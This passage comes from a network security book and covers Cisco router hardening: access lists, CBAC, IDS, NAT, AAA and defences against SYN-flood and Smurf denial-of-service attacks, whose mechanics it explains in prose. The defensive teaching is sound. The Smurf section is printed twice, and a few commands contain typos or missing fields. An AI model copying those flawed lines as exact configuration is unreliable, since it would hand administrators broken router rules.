filtering on \nsource IP address, extended access lists can also filter on \nƒ \nDestination IP address \nƒ \nTransport (IP, TCP, UDP, ICMP, GRE, IGRP) \nƒ \nDestination port number \nƒ \nPacket type or code in the case of ICMP \nƒ \nEstablished connects (verifies that either the ACK or RST bits have been set) \nClearly, this can give you a much more granular level of control over your perimeter traffic. Extended access lists \nare created in global configuration mode using the following syntax: \n" }, { "page_number": 130, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 130\naccess-list {list # or name} permit/deny {protocol} {source} {mask} \n{destination} {mask} {operator} {port} est (short for establish if \napplicable) \nValid operators are \nlt Less than \ngt Greater than \neq Equal to \nneq Not equal to \nAs an example, let’s say you wish to create a set of extended access rules allowing open access to HTTP on the \nhost 206.121.73.10 and allowing telnet access, as well—but only from hosts on the subnet 199.52.24.0. These \nrules would look similar to the following: \naccess-list 101 permit any 206.121.73.10 0.0.0.0 eq 80 \naccess-list 101 permit 199.52.24.0 0.0.0.255 206.121.73.10 0.0.0.0 eq 23 \nYou would then install these rules on the serial port by entering configuration mode for that interface and entering \nthe command \nip access-group 101 in \nProblems with FTP \nAs you saw in the section on FTP in Chapter 3, this protocol can be a real pain to support through a firewall. This \nis because the protocol actually uses two ports while transferring files. To review, you are stuck with the \nfollowing: \nƒ \nStandard FTP: All inbound service ports above 1023 must be left open to support data \nconnection. \nƒ \nPassive FTP: All outbound service ports above 1023 must be left open to support data \nconnection. \nIn a world of the lesser of two evils, it is usually better to support only passive FTP. This is supported by all Web \nbrowsers and most graphic FTP programs. It is typically not supported by command-line FTP programs. \nIn order to support passive FTP, you must allow all internal hosts to access any TCP ports above 1023 on systems \nlocated out on the Internet. Not the best security stance, but it is certainly far better than the standard FTP \nalternative. \nIf there are specific services you wish to block, you can create these access list entries before the entry that opens \nall outbound ports. Since the rules are processed in order, the deny rules would be processed first, and the traffic \nwould be dropped. For example, let’s say you wish to block access to X11 and Open Windows servers, but you \nwant to open the remaining upper ports for passive FTP use. In this case you would create the following rules: \naccess-list 101 deny any any eq 2001 \naccess-list 101 deny any any eq 2002 \naccess-list 101 deny any any eq 6001 \naccess-list 101 deny any any eq 6002 \naccess-list 101 permit any any gt 1023 \nThe only problem here is that you would receive random FTP file transfer failures when the client attempted to use \nports 2001, 2002, 6001, or 6002. This would probably not happen often, but intermittent failures are usually the \nmost annoying. \nCreating a Set of Access Lists \nLet’s go through an example to see how this would all pull together. Let’s assume that you have a network \nconfiguration similar to the one in Figure 6.4. You need to allow HTTP to the Web server and SMTP access to the \n" }, { "page_number": 131, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 131\nmail server. The mail server also runs the local DNS process. Additionally, you would like to provide unrestricted \noutbound access to all TCP services. \n \nFigure 6.4: Using access lists on a simple network \nYour access list rules would look something like those that follow. Lines starting with an exclamation point (!) are \nconsidered comments or remarks by the Cisco IOS. \n! Stop any inbound spoofing \naccess-list 1 deny 206.121.73.0 0.0.0.255 \n! Let in replies to established connection \naccess-list 101 permit tcp any 206.121.73.0 0.0.0.255 gt 1023 est \n! Look for port scanning \naccess-list 101 deny tcp any any eq 19 log \n! Allow in SMTP mail to the mail server \naccess-list 101 permit tcp any 206.121.73.21 0.0.0.0 eq 25 \n! Allow in DNS traffic \naccess-list 101 permit tcp any 206.121.73.21 0.0.0.0 eq 53 \naccess-list 101 permit udp any 206.121.73.21 0.0.0.0 eq 53 \n! Allow in HTTP to the web server \naccess-list 101 permit tcp any 206.121.73.20 0.0.0.0 eq 80 \n! Let in replies if an internal user pings an external host \naccess-list 101 permit icmp any any echo-reply \n! Allow for flow control \naccess-list 101 permit icmp any any source-quench \n! Let in replies if an internal user runs traceroute \naccess-list 101 permit icmp any any time-exceeded \n! Insure that our internal users do not spoof \naccess-list 2 permit 206.121.73.0 0.0.0.255 \n! Let out replies from the web server \naccess-list 102 permit tcp 206.121.73.20 0.0.0.0 any gt 1023 est \n! Let out replies from the mail/DNS server \naccess-list 102 permit tcp 206.121.73.21 0.0.0.0 any gt 1023 est \n! Let out DNS traffic from the DNS server \naccess-list 102 permit udp 206.121.73.21 0.0.0.0 any eq 53 \n! Block all other UDP traffic except for DNS permitted above \naccess-list 102 deny udp 206.121.73.0 0.0.0.255 any \n" }, { "page_number": 132, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 132\n! Allow a single host to create Telnet sessions to the router \naccess-list 102 permit tcp 206.121.73.200 0.0.0.0 206.121.73.1 0.0.0.0 eq 23 \n! Block all other hosts from creating Telnet sessions \n! to the router \naccess-list 102 deny tcp any 206.121.73.1 0.0.0.0 eq 23 \n! Allow all TCP traffic through \naccess-list 102 permit ip 206.121.73.0 0.0.0.255 any \nOnce this list has been entered (or pasted) in global configuration mode, you would first go to configuration mode \nfor the serial interface and enter the commands \nip access-group 1 in \nip access-group 101 in \nYou would then go to configuration mode for the Ethernet interface and enter the commands \nip access-group 2 in \nip access-group 102 in \nWhen you’re finished, your access lists will be active and your router should begin filtering traffic. You should \ntest your configuration immediately to make sure that all is working as you expect. \nA Few Comments on Our Sample Access Lists \nThe third access list is labeled “look for port scanning.” This is accomplished by logging a specific port so that any \nactivity is displayed on the console terminal. As mentioned, routers typically have very poor logging capability. \nYou do not want to log too much information—it may scroll off the screen before you catch it. By monitoring a \nport that you know an attacker will check (port 19 is chargen, or Character Generator, which has quite a few \nvulnerabilities), you can strike a good balance between not logging too much information and still catching \nsuspect traffic. \nLines 12 and 13 limit outbound replies to only the Web and mail servers. Since these are the only two systems \noffering services, they are the only two that should be sending replies back to Internet hosts. Lines 14 and 15 limit \nUDP traffic to DNS and only from the DNS server. Since UDP is unreliable, it is also insecure. These filters limit \nyour vulnerability to a single system. Of course, this means that all internal hosts will need to use the mail system \nfor DNS resolution. \nLines 16 and 17 specify that only a single host can gain remote access to the router. This will help to strengthen \nthe device’s protection even further. Remember that when you use telnet to manage the router (without enabling \nany router-to-router encryption), all information (including passwords) is sent clear text. These filters help to \ninsure that even if someone does compromise the passwords, they are only useful from a single remote system \n(unless of course the attacker fakes his IP address, but we will not go there). \nFinally, the access rules end by stating, “Let out any TCP traffic we have not explicitly denied.” If there are TCP \nservices you wish to filter, you could enter these test conditions prior to this last rule. \n \nTip \nDo not save your changes right away. Perform your testing with the changes in active memory \nonly. If you have inadvertently locked yourself out of the device, you can simply power cycle it \nto return to the last saved configuration. Just remember to save the new configuration once you \nknow the changes are acceptable! \nDynamic Access Lists \nExceptions can arise for any security policy, and dynamic access lists are a reflection of that necessity. Also called \nlock-and-key, this feature creates dynamic extended access lists. However, it can also be used with standard and \nstatic extended access lists. \nIf activated, lock-and-key changes the existing access list for a given interface to allow a designated user to access \na given resource. Lock-and-key then alters the access list again, reverting it to its previous state. \nLock-and-key provides benefits beyond that of traditional standard and static extended access lists: \n" }, { "page_number": 133, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 133\nƒ \nUsers are authenticated through a challenge mechanism. \nƒ \nIn larger networks lock-and-key provides a simplified method for management. \nƒ \nRouter processing of access lists is decreased. \nƒ \nFewer exploitable openings occur in the router infrastructure. \nHere is an example of how lock-and-key works: \n1. Let’s say a vacationing administrator must remotely connect to the network to perform \ntroubleshooting. The administrator opens a telnet session to the router. \n2. The router performs a user authentication process (either by itself or through a separate \nsecurity system like TACACS+ or RADIUS). \n3. Upon successful authentication, the administrator is logged out of the telnet session, and \nthe router makes a temporary entry in the dynamic access list. \n4. The administrator now has access into the internal network and makes the required \nchanges. \n5. Once finished, the administrator initiates a new telnet session and manually clears the \ntemporary entry. The administrator could have also specified an idle or absolute timeout \nvalue for the entry; in which case the router would have automatically cleared the entry \nafter it had expired. \nFor example, consider the following code, starting with the command to configure a dynamic access list: \naccess-list {access-list-number} dynamic {dynamic-name} {deny or permit} \ntelnet {source} {source-wildcard} {destination} {destination-wildcard} \nprecedence {precedence} tos {tos} established log \nIn practice, even if administrative policy is to manually clear the entry, a timeout value is an easily configurable \nreassurance that a potential security hole is closed. \nSpoofing \nThe temporary entry in the dynamic access list created by lock-and-key is an opening that makes the router \nsusceptible to spoofing. One method of countering this threat is to enable encryption on the router and on the \nremote router servicing the remote host (in our example, the router acting as the administrator’s immediate \ngateway). With an encrypted connection, the host IP address is hidden from any potential hackers within the \nencrypted traffic, and therefore can’t be spoofed. \nReflexive Access Lists \nAs of IOS 11.3, Cisco routers support reflexive access lists. Reflexive access lists are made to be a replacement for \nthe static establish command. When reflexive access lists are used, the router creates a dynamic state table of all \nactive sessions. \nThe ability to generate a state table pushes the Cisco router into the realm of a true firewall. By monitoring state, \nthe router is in a far better position to make filter determinations than equivalent devices that only support static \nfiltering. \nIn order to use reflexive access lists, you must use access list names, not range identifier numbers. This is not a big \ndeal, as using a name allows you to be far more descriptive in labeling your access lists. \nThe syntax for creating a reflexive access list is \npermit {protocol} {source} {mask} {destination} {mask} reflect {name} \nSo you could create a reflexive access list using the following parameters: \npermit ip any any reflect ipfilter \nLet’s assume that you only wish to allow in SMTP to a single internal host, as well as any replies to active \nsessions that were established by any system on your internal network. In this situation, you could create the \nfollowing in global configuration mode: \n" }, { "page_number": 134, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 134\nip access-list extended inboundfilters \npermit tcp any 206.121.73.21 0.0.0.0 eq 25 \nevaluate tcptraffic \nThis would allow inbound replies to active sessions and inbound SMTP sessions to be established. \nThe only caveat with reflexive access lists is that entries are purged from the table after 300 seconds of inactivity. \nWhile this is not a problem for most protocols, the FTP control session (port 21) can sit idle for a far longer period \nof time during a file transfer. You can increase this timeout value using the following command: \nip reflexive-list timeout {timeout in seconds} \nTCP Intercept \nDoS (denial-of-service) attacks have become quite prevalent recently. The most popular way to implement this \nattack is using the SYN flood. A hacker creates a SYN flood by initiating a large quantity of connection requests \nin a short amount of time. Because the connection requests don’t come from valid addresses, the server can’t \ncomplete the connection. The result is that the server is so tied up in attempting to respond to invalid requests that \nit has no resources left to answer legitimate requests for services (such as Web, FTP, and e-mail). \nCisco’s TCP intercept component resolves this problem by answering all incoming connection requests itself. If \nsuccessful, it opens a connection with the server and links the two connections together. If the connection request \nis not legitimate, the connection request is dropped—and a threshold counter is incremented. Once the limit on this \ncounter is reached, all additional connection requests from that particular address are automatically dropped. \nActivating TCP Intercept \nBefore TCP intercept can be enabled, an extended access list has to be created: \naccess-list {access-list-number} {deny or permit} tcp {destination} \nFollowing this, enter the command to activate TCP intercept: \nip tcp intercept list {access-list-number} \nTCP intercept can operate in two modes: intercept or passive watch. In default intercept mode, TCP intercept \nintercedes and responds to every incoming SYN with a SYN-ACK. Only after receiving an ACK from the remote \nhost does the router pass along the original SYN request to the server, completing a three-way TCP handshake. \nFinally, the router joins both connections together. \nIf TCP intercept is configured in passive watch mode, the router does not intercept communications unless a \nconnection request goes unanswered after a period of time (default to 30 seconds). Passive watch mode is \nconfigured with the following command: \nip tcp intecept mode {intercept or watch} \nContext-Based Access Control \nContext-Based Access Control (CBAC) uses information at the application layer of the OSI model to filter TCP \nand UDP network traffic and analyze and permit traffic going through both sides of a router. Because of its ability \nto look at application data, CBAC allows filtering for protocols that open up multiple channels (such as RPC, FTP, \nand most multimedia protocols), as well as Java applets (providing they are not compressed or archived). \nBecause CBAC opens connections dynamically (limiting data to those sessions that were initiated from within a \nfirewall), it provides a defense against DoS attacks. CBAC also verifies that TCP sequence numbers are within \nexpected ranges, and will also watch and respond to abnormally elevated rates of connection requests. \nApplication-based logging and alerts are another benefit of CBAC. By tracking time stamps, source and \ndestination addresses, ports, and data transferred, CBAC gives centralized reporting and management systems \nenough information to match network patterns against hacking “signatures,” allowing the system to automate \nsome of its defense against known penetration and DoS methods. \nWhile CBAC can evaluate any generic TCP or UDP session, it can also analyze the following popular application \nprotocols: \nƒ \nFTP \nƒ \nTFTP \nƒ \nH.323 (protocol used by Microsoft Netmeeting) \n" }, { "page_number": 135, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 135\nƒ \nHTTP (including Java applets) \nƒ \nMicrosoft Netshow \nƒ \nrexec, rsh, rlogin \nƒ \nRealMedia \nƒ \nRTSP (Real Time Streaming Protocol) \nƒ \nSMTP \nCBAC Example \nLet’s use a sample FTP session to walk through the CBAC process in detail: \n1. The external interface of a router receives a packet originating on the internal (secure) \nside of the network. \n2. The router uses the outbound access list defined on the external interface to determine if \nthe packet is allowed. Non-allowed packets are automatically denied. \n3. If the packet is allowed, CBAC creates a new connection state table and stores the \npacket’s information in it. \n4. CBAC then temporarily modifies the incoming access list on the external interface to \nallow the returning session data into the internal network (packets that match the same \nstate data that was taken from the outgoing packet and stored in the connection state \ntable). Only after the access list is modified does CBAC forward the outgoing packet \nfrom the external interface. \n5. As data returns to the external interface, all packets are compared to the incoming \naccess control list. If the valid connection data matches the temporary changes made by \nCBAC to the access control list, those packets are forwarded into the internal network, \ncompleting the connection. \n6. When a connection terminates (or if it times out), CBAC removes the connection state \ntable and the temporary changes to the access control list, returning the router to its \nprevious state. \nConfiguring CBAC \nThere are several steps to configuring CBAC: \n1. Select the interface. For networks with a DMZ (Demilitarized Zone), the evaluation will \ntake place on the internal interface. For simple networks, packets are screened on the \nexternal interface. \n2. Implement an IP access list. After creating a basic access list, all CBAC-evaluated \ntraffic is permitted out, but all incoming CBAC traffic is denied. (CBAC will make its own \ndynamic and temporary exceptions to these rules.) \n3. Set timeouts and thresholds. These settings determine how long connection state \ntables are maintained and how long to wait before incomplete connections are \nterminated, which provides a defense against DoS attacks. To activate this last feature, \nenter the following at the console: \nip inspect tcp synwait-time {seconds} \n4. Create an inspection rule. This determines what application layer protocols will be \nevaluated at the interface. Options include alerting, auditing, and whether the rule \nchecks for IP fragmentation. This example establishes an FTP inspection rule: \nip inspect name ftprule ftp alert on audit-trail on timeout 30 \n5. Apply the inspection rule. The rule is applied to outbound traffic if it is set at the \nexternal interface, and to inbound traffic if it is set at the internal interface. Continuing our \nexample, \nip inspect ftprule out \n6. Establish logging. This helps determine unauthorized access attempts as well as \ncreating a record of legitimate traffic and services. Global auditing would be enabled like \nthis: \n" }, { "page_number": 136, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 136\nip inspect audit-trail \nFirewall Intrusion Detection System \nCisco’s Intrusion Detection System (IDS) uses 59 attack signatures to recognize and react to hacking attempts. IDS \nis designed to recognize, record, and react to an attack before a breach can occur. IDS signatures are broken into \ntwo categories: info and attack. An info signature looks for attempts to collect information about the network, (like \na port scan). The attack signature looks for actual breach attempts. Each of these two categories is further \nsubdivided into atomic and compound signatures. Atomic signatures look for tiny details, such as a request for a \nspecific port. Compound signatures look for overall patterns. \nIDS Process \nThe IDS system works as follows: \nAudit rule is created. Any number of signatures (from one to all) can be associated with a rule. \nAudit rule is applied. When the rule is applied to incoming traffic, IDS has an opportunity to \nevaluate them before the ACL does, thereby providing attack details that would normally be lost by \nACL denial. If the rule is applied to outgoing traffic on an interface, IDS analyzes that data only \nafter it has entered the router from another port. \nPackets are audited. Various modules analyze the packet, starting with IP, then moving on to \neither ICMP, TCP, or UDP, and ending with the application layer. \nSignature is matched. If a packet matches a signature at any of the models, then the appropriate \naction takes over: \nƒ \nAlarm: sends an alarm to a central monitoring system. \nƒ \nDrop: the packet is not forwarded. \nƒ \nReset: the packet has its reset flag set. These packets are then sent to each \nparty in the connection. \nConfiguring IDS \nThe steps to configure IDS include: \nƒ \nActivate IDS \nƒ \nActivate the Post Office \nƒ \nCreate and activate audit rules \nActivating IDS Activating IDS requires two commands to be issued at the console in global configuration mode. \nThe first establishes auditing: \nip audit {protocol} {signature} {options} \nThe second command establishes a limit to how many stored events matching a particular signature are sent to the \nIDS Director (the centralized alert monitoring system for IDS): \nip audit po max-events {quantity of events} \nActivating the Post Office The Post Office is a proprietary Cisco protocol that creates point-to-point connections \nbetween the IDS central management system and IDS hosts (routers configured with IDS features). Alarms are \ntransferred along the Post Office to either a log, or to the IDS Director. \nip audit notify nr-director/log \nAll hosts are assigned a number between 1 and 65535 (the host-id). The Director, along with all participating IDS \nrouters, are assigned a common organization number also between 1 and 65535 (the org-id). \nip audit po local hostid {host-id} orgid {org-id} \nPost Office parameters for the Director also have to be set, including the following: \n" }, { "page_number": 137, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 137\nrmtaddress: the IP address of the Director \nlocaladdress: the IP address of the host interface \nport: 45000 by default, this is the port number through which the Director expects to hear alarms \npreference: if more than one route is configured to the Director, this number (either 1 or 2) \ndetermines the priority for this particular connection \ntimeout: how long until the Post Office determines a connection has timed out (in seconds) \napplication: what type of system is handling the events (log or Director) \nip audit po remote hosted {host-id} orgid {org-id} rmtaddress \n{ipaddress} localaddress {ipaddress} port {port-number} preference \n{number} timeout {seconds} application {type} \nCreating and Activating Audit Rules The first two commands determine what default actions are taken when \npackets match an info signature or an attack signature (alarm, drop, or reset): \nip audit info alarm/drop/reset \nip audit attack alarm/drop/reset \nOnce default actions are specified, a user-supplied audit-name (which can be used later to assign signatures to the \nrule) is assigned to a particular rule along with a signature type (info or attack), standard ACL, and action (alarm, \ndrop, reset): \nIp audit name {audit-name} info/attack list {standard ACL} action \nalarm/drop/reset \nOnce defined, a rule is then applied to an interface along with a direction (in or out). This command is issued in \ninterface mode: \nip audit {audit-name} in/out \nFinally, the IP address of the network to be protected is configured (in global configuration mode): \nip audit po protected {ip address} \nAuthentication Proxy \nCisco’s authentication proxy associates security policies with user profiles, allowing control over how individuals \naccess network resources. User profiles come from a RADIUS or TACACS+ server, but only when the user is \nactively engaging in data transfers. Cisco has integrated the authentication proxy with other security services like \nNAT, CBAC, VPN, and IPSec, which provides a consistent integration of all access control policies. \nThe authentication proxy works by intercepting a user’s HTTP requests. If the user has already been authenticated, \nthe proxy forwards that packet (and any subsequent packets from the same connection). If the authentication proxy \ndetermines that they haven’t been authorized, the router’s HTTP server provides the user with a prompt to provide \na username and password. If the user doesn’t provide correct information after five attempts, the proxy ceases to \nrespond (denying even a login prompt) for two minutes. \nWhen the authentication proxy determines that the user has provided a valid username and password, it obtains the \nuser profile from the AAA server. Based on this profile, the authentication proxy makes a dynamic entry to the \nACL of both the inbound and outbound interfaces required to complete the connection. If the user continues to use \nthe connection within the timeout limit, she is not prompted to re-enter her credentials. The authentication proxy \nremoves the dynamic ACL changes after the end of the timeout period. \nConfiguring Application Proxy \nThere are three required steps to configure the application proxy: \nƒ \nConfigure AAA \n" }, { "page_number": 138, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 138\nƒ \nConfigure the HTTP server \nƒ \nConfigure the application proxy \nConfiguring AAA The following command enables the router for AAA: \naaa new-model \nThe next two commands define which authentication service is to be offered to the user by default at login \n(RADIUS or TACACS+), and then allow those services: \naaa authentication login default RADIUS/TACACS+ \naaa authorization auth-proxy default {1st method} {2nd method}… \nTo specify the RADIUS or TACACS+ server, use \nradius/tacacs-server server host {hostname} \nTo specify the service key used for encryption and authentication between the router and the server, use \nradius/tacacs-server key {key} \nFinally, an ACL permits traffic back from the authentication server: \naccess-list {number of access list} \npermit tcp host {source} eq {tacacs} host {destination} \nConfiguring the HTTP Server These commands are entered in global configuration mode. The first enables the \nHTTP server on the router: \nip http server \nThe second command sets AAA as the authentication mode: \nip http authentication aaa \nThe third and final command specifies which access list is bound to the HTTP server: \nip http access-class {number of access list} \nConfiguring the Authentication Proxy Finally, the authentication proxy is itself configured. The first command \nsets the timeout, after which the authentication proxy removes the dynamic changes to the ACL (along with user \nauthentication entries): \nip auth-proxy auth-cache-time {minutes} \nThe next command actually creates the authentication proxy rule and associates it with the HTTP protocol: \nIp auth-proxy name {rule name} http \nThe final command is issued in interface mode, and activates the rule by associating it with an interface: \nip auth-proxy {rule name} \nApplication Mapping \nCisco uses port-to-application mapping (PAM) to allow organizations to create CBAC-enforced filtering policies \naround non-standard (non-registered) TCP and UDP ports. The PAM feature does this by creating a table map \nassociating applications with specific ports. Using standard ACLs, PAM can also be applied to an entire subnet, or \na single host. There are three different types of entries in the PAM table: \nSystem-defined These entries cannot be edited or deleted, and consist of the registered (or well-\nknown) port-to-application mappings (such as TCP 21=FTP). \nUser-defined Custom entries of port-to-application mappings, with the limitation that applications \ncan’t be mapped to well-known ports (i.e., HTTP can’t be mapped to TCP 21, which is already \nassigned to FTP by a system-defined entry). \nHost-defined This option allows mappings to be created specifically for an IP host or subnet. This \ncreates additional security by only allowing HTTP traffic destined for a custom (and therefore \n" }, { "page_number": 139, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 139\nhidden) port on a Web server if it originates from an internal subnet. Host-defined entries are also \nthe only way to override system-defined mappings. \nConfiguring PAM \nPAM is enabled on a router by specifying the application name and the port number, along with the option of \nassociating PAM with a standard ACL (in order to apply a mapping to a subnet or host): \nip port-map {application name} port {port number} list {ACL number} \nDelete a mapping by using a variant of the previous command: \nno ip port-map {application name} port {port number} list {ACL number} \nOverriding a standard port-to-application mapping requires two commands, the first to create a standard ACL that \nis applied to a specific host; the second to create the port mapping override: \naccess-list {ACL number} permit {IP address of host} \nip port-map {application name} port {port number} list {ACL from \naccess-list command} \nNetwork Address Translation \nOriginally conceived as a technique to preserve IP addresses, Network Address Translation (NAT) provides an \nadditional layer of network security by hiding your network IP addresses from the Internet. NAT allows \norganizations to use private IP address ranges (private because no public router will recognize or route packets \nwith a source or destination address that belongs to a private range), yet still have connectivity with the Internet. \nCisco uses the following terms to make understanding NAT concepts and configuration clearer: \nInside local address The private IP address assigned to a host on the internal network. \nInside global address The public IP address that is assigned to outgoing data originating from an \ninside local address (assigned to a host on the private network) as it crosses the NAT router. This \naddress is unique on the public Internet, hence global. \nOutside global address The host IP address as assigned by the owner of the host (and a valid \npublic Internet address). \nOutside local address The IP address of a host on the outside network as it appears to the inside \nnetwork. Because NAT can work both ways, the outside global address of a host can also be hidden \nfrom the internal private network. \nA router performing NAT works on the border between the private network of an organization and the public \nInternet. When a host on the internal network requests a connection to a host with an outside global address (such \nas a public Web server), it sends the packet to a NAT router. NAT changes the source IP address (the host’s inside \nlocal address) on the packet to an outside global address (assigned to the NAT interface connected to the Internet), \nand then forwards the packet to the Internet host. As the Internet host returns the packet, it sets its own outside \nglobal address as the source address and the NAT-assigned outside global address as the destination address. \nWhen the packet reaches NAT, NAT replaces the destination outside global address with the inside local address \nof the host that originated the session, and forwards the packet to the internal host. NAT repeats this process for \nthe duration of the session. \nStatic Address Translation \nNAT can perform both static and dynamic address translation. Static translation associates a single inside local \naddress to a single inside global address (which is not shared with any other sessions originating from the internal \nnetwork). Static translation allows an outside global address to initiate a communication session with a host on the \ninternal network, while keeping the assigned inside local address secret. For example, you would use static address \ntranslation if you had a Web server that was located on the internal network that still needed to be able to receive \nHTTP sessions originating from an outside global address. \n" }, { "page_number": 140, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 140\nThe first step to configuring static address translation is associating an inside local address with an inside global \naddress: \nip nat inside source static \nThe final four commands define the private and public interfaces as being either inside or outside in relation to \nNAT: \ninterface {type} {number} \nip nat inside \ninterface {type} {number} \nip nat outside \nDynamic Address Translation \nDynamic address translation associates an inside local address with an internal global address chosen from a pool \nof addresses. This is the most common configuration for hosts on the internal network that act as clients for \nInternet services. It is also the least taxing administratively. \nThe first command to enable dynamic address translation creates a range of IP addresses (the address pool): \nip nat pool {name of pool} {starting IP address} {ending IP address} \nThen an ACL is created that defines which inside local addresses are allowed to be translated: \naccess list {access list number} permit {source} \nDynamic address translation is enabled while specifying the access list created in the previous command: \nip nat inside source list {access list number} pool {name of pool} \nThe final four commands define the private and public interfaces as being either inside or outside in relation to \nNAT: \ninterface {type} {number} \nip nat inside \ninterface {type} {number} \nip nat outside \nUser Authentication and Authorization \nCisco routers use user-based authentication and authorization for access to network resources, (including access to \nthe router itself). Authentication is the process that verifies the identity of the user. Authorization generally follows \nimmediately after authentication and ensures that a user actually has the permissions necessary to access a \nresource. In both instances, separate security services are commonly used (RADIUS, Kerberos, and less common, \nTACACS and TACACS+). There are three steps to enable authentication and authorization services on a router: \nƒ \nActivate AAA \nƒ \nActivate authentication \nƒ \nActivate authorization \nActivating AAA \nActivating AAA on a router is quite simple. Keep in mind, however, that TACACS and TACACS+ are older \nprotocols and not compatible with AAA (which was designed for the newer RADIUS and Kerberos protocols). \nEnter the following command in global configuration mode: \naaa new-model \nDeactivating AAA is just as easy as activating it: \nno aaa new-model \n" }, { "page_number": 141, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 141\nActivating Authentication \nAuthentication (like authorization) relies on a method list. A method list contains one or more ways a user can be \nauthenticated (or authorized) on a router. In case one of the services is unavailable (perhaps your RADIUS server \ngoes down), the router can use a backup method (another RADIUS server or a locally-stored user database) to \nauthenticate the user. Instead of defining individual authentication services, the method list is defined on groups. A \nsingle group can have more than one instance of the same type of service (i.e., one or more RADIUS services in \nthe RADIUS group). \nThe first command defines the group name and the IP addresses of its members: \naaa group server radius {group name} server {ip address} \nThe next command defines a method list titled “default” and applies the list to all router logins. All users will be \nauthenticated by the RADIUS group unless all servers within that group are unreachable, in which case the router \nwill look to the local user database: \naaa authentication login default group radius local \nActivating Authorization \nMethod lists are also used to define where the system finds and retrieves the system profiles that define user \naccess. Configured in a manner similar to authentication method lists, authorization method lists also define which \nnetwork services are controlled by the various methods. These network services are combined into five categories: \nAuth-proxy part of the Authentication Proxy system, used to associate policies on a per-user basis \nCommands defines access on specific commands given in the EXEC mode on the router \nEXEC specifies characteristics of the router terminal session in general \nNetwork all network sessions including PPP \nReverse Access pertains to reverse telnet sessions \nThe first command creates a method list: \naaa authorization auth-proxy/network/exec/commands {level}/reverse-access \n{list name} {method} \nThe second command (performed in interface mode) links the authorization method list with an interface: \nlogin authorization {list name} \nAdditional Security Precautions \nAlong with all the security precautions we have looked at so far, there is one more worth adding to the list. Our \nfinal task is to help prevent Smurf attacks. Named after the original program that would launch this attack, Smurf \nuses a combination of IP spoofing and ICMP replies in order to saturate a host with traffic, causing a denial of \nservice. \nThe attack goes like this: Woolly Attacker sends a spoofed ping packet (echo request) to the broadcast address of a \nnetwork with a large number of hosts and a high-bandwidth Internet connection. This is known as the bounce site. \nThe spoofed ping packet has a source address of the system Woolly wishes to attack. \nThe premise of the attack is that when a router receives a packet sent to an IP broadcast address (such as \n206.121.73.255), it recognizes this as a network broadcast and will map the address to an Ethernet broadcast \naddress of FF:FF:FF: FF:FF:FF. So when your router receives this packet from the Internet, it will broadcast it to \nall hosts on the local segment. \nI’m sure you can see what happens next. All the hosts on that segment respond with an echo reply to the spoofed \nIP address. If this is a large Ethernet segment, there may be 500 or more hosts responding to each echo request \nthey receive. \nSince most systems try to handle ICMP traffic as quickly as possible, the target system whose address Woolly \nAttacker spoofed quickly becomes saturated with echo replies. This can easily prevent the system from being able \nto handle any other traffic, thus causing a denial of service. \n" }, { "page_number": 142, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 142\nThis not only affects the target system, but your organization’s Internet link, as well. If the bounce site has a T3 \nlink (45Mbps) but the target system’s organization is hooked up to a leased line (56Kbps), all communication to \nand from your organization will grind to a halt. \nSo how can you prevent this type of attack? You can take steps at the source site, bounce site, and target site to \nhelp limit the effects of a Smurf attack. \nBlocking Smurf at the Source \nSmurf relies on the attacker’s ability to transmit an echo request with a spoofed source address. You can stop this \nattack at its source by using the standard access list described earlier in this chapter. This will insure that all traffic \noriginating from your network does in fact have a proper source address—stopping the attack at its source. \nBlocking Smurf at the Bounce Site \nIn order to block Smurf at the bounce site, you have two options. The first is to simply block all inbound echo \nrequests. This will prevent these packets from ever reaching your network. \nIf blocking all inbound echo requests is not an option, then you need to stop your routers from mapping traffic \ndestined for the network broadcast address to the LAN broadcast address. By preventing this mapping, your \nsystems will no longer receive these echo requests. \nTo prevent a Cisco router from mapping network broadcasts to LAN broadcasts, enter configuration mode for the \nLAN interface and enter the command \nno ip directed-broadcast \nWarning \nThis must be performed on every LAN interface on every router. This command will \nnot be effective if it is performed only on your perimeter router. \nBlocking Smurf at the Target Site \nUnless your ISP is willing to help you out, there is little you can do to prevent the effects of Smurf on your WAN \nlink. While you can block this traffic at the network perimeter, this is too late to prevent the attack from eating up \nall of your WAN bandwidth. \nYou can, however, minimize the effects of Smurf by at least blocking it at the perimeter. By using reflexive access \nlists or some other firewalling device that can maintain state, you can prevent these packets from entering. Since \nyour state table would be aware that the attack session did not originate on the local network (it would not have a \ntable entry showing the original echo request), this attack would be handled like any other spoof attack and \npromptly dropped. \nAdditional Security Precautions \nAlong with all the security precautions we have looked at so far, there is one more worth adding to the list. Our \nfinal task is to help prevent Smurf attacks. Named after the original program that would launch this attack, Smurf \nuses a combination of IP spoofing and ICMP replies in order to saturate a host with traffic, causing a denial of \nservice. \nThe attack goes like this: Woolly Attacker sends a spoofed ping packet (echo request) to the broadcast address of a \nnetwork with a large number of hosts and a high-bandwidth Internet connection. This is known as the bounce site. \nThe spoofed ping packet has a source address of the system Woolly wishes to attack. \nThe premise of the attack is that when a router receives a packet sent to an IP broadcast address (such as \n206.121.73.255), it recognizes this as a network broadcast and will map the address to an Ethernet broadcast \naddress of FF:FF:FF: FF:FF:FF. So when your router receives this packet from the Internet, it will broadcast it to \nall hosts on the local segment. \nI’m sure you can see what happens next. All the hosts on that segment respond with an echo reply to the spoofed \nIP address. If this is a large Ethernet segment, there may be 500 or more hosts responding to each echo request \nthey receive. \nSince most systems try to handle ICMP traffic as quickly as possible, the target system whose address Woolly \nAttacker spoofed quickly becomes saturated with echo replies. This can easily prevent the system from being able \nto handle any other traffic, thus causing a denial of service. \nThis not only affects the target system, but your organization’s Internet link, as well. If the bounce site has a T3 \nlink (45Mbps) but the target system’s organization is hooked up to a leased line (56Kbps), all communication to \nand from your organization will grind to a halt. \n" }, { "page_number": 143, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 143\nSo how can you prevent this type of attack? You can take steps 